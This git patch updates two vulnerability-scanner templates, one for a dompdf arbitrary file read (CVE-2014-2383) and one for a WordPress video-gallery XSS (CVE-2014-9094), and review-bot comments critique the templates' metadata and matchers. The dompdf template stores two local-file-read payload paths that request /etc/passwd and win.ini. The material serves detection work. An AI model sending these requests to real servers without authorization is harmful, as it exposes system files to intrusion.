From bcb594fc56bced7b33a40dce7db9cb08bb147d79 Mon Sep 17 00:00:00 2001
From: sandeep
Date: Tue, 21 Sep 2021 15:46:26 +0530
Subject: [PATCH] more updates
---
 cves/2014/CVE-2014-2383.yaml | 10 +++++-----
 cves/2014/CVE-2014-9094.yaml | 5 ++---
 2 files changed, 7 insertions(+), 8 deletions(-)
diff --git a/cves/2014/CVE-2014-2383.yaml b/cves/2014/CVE-2014-2383.yaml
index 7607410c38..07726343d2 100644
--- a/cves/2014/CVE-2014-2383.yaml
+++ b/cves/2014/CVE-2014-2383.yaml
@@ -1,14 +1,14 @@
-id: arbitrary-file-read-in-dompdf
+id: CVE-2014-2383
 info:
 name: Arbitrary file read in dompdf < v0.6.0
 author: 0x_Akoko
 severity: high
 reference: https://www.exploit-db.com/exploits/33004
- tags: dompdf,lfi
-
-# - "/dompdf.php?input_file=C:/windows/win.ini"
-# - "/dompdf.php?input_file=/etc/passwd"
+ tags: cve,cve2014,dompdf,lfi
+ metadata:
+ win-payload: "/dompdf.php?input_file=C:/windows/win.ini"
+ unix-payload: "/dompdf.php?input_file=/etc/passwd"
 requests:
 - method: GET
diff --git a/cves/2014/CVE-2014-9094.yaml b/cves/2014/CVE-2014-9094.yaml
index 12b29d2090..8e73d7da9b 100644
--- a/cves/2014/CVE-2014-9094.yaml
+++ b/cves/2014/CVE-2014-9094.yaml
@@ -4,9 +4,9 @@ info:
 name: WordPress DZS-VideoGallery Plugin Reflected Cross Site Scripting
 author: daffainfo
 severity: medium
- reference: https://nvd.nist.gov/vuln/detail/CVE-2014-9094
- tags: cve,2014,wordpress,xss,wp-plugin
 description: "Multiple cross-site scripting (XSS) vulnerabilities in deploy/designer/preview.php in the Digital Zoom Studio (DZS) Video Gallery plugin for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) swfloc or (2) designrand parameter."
+ reference: https://nvd.nist.gov/vuln/detail/CVE-2014-9094
+ tags: cve,cve2014,wordpress,xss,wp-plugin
 requests:
 - method: GET
@@ -18,7 +18,6 @@ requests:
 - type: word
 words:
 - ""
- part: body
 - type: word
 part: header
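Review bot: The `info` block now carries a CVE id but still has no `description`, and its only `reference` is an exploit-db entry. Add a one-line `description` and list the advisory next to the existing link, e.g. `- https://nvd.nist.gov/vuln/detail/CVE-2014-2383`, as the CVE-2014-9094 template in this same commit does, so whoever triages a hit can find the affected versions and the fix. The two new `metadata` entries are free text that nothing checks against the `requests` block, which continues outside the hunk, so they can drift from what the template really sends. Renaming `id` also means any scan profile that selects or excludes the old `arbitrary-file-read-in-dompdf` id will silently stop applying, which deserves a changelog line.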
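Review bot: The first word matcher in the last hunk, as shown here, searches for `""`, and an empty word is contained in every response, so that matcher constrains nothing. If the value is really empty in the file (it may have been stripped when this page was rendered), it should be the exact marker string the request reflects. Removing `part: body` is safe only because body is the default part for a word matcher. The `matchers-condition` line sits outside the hunk, so please confirm it is `and`; otherwise the header matcher alone reports a finding and the template produces false positives. The matchers block starts before the hunk and continues after it.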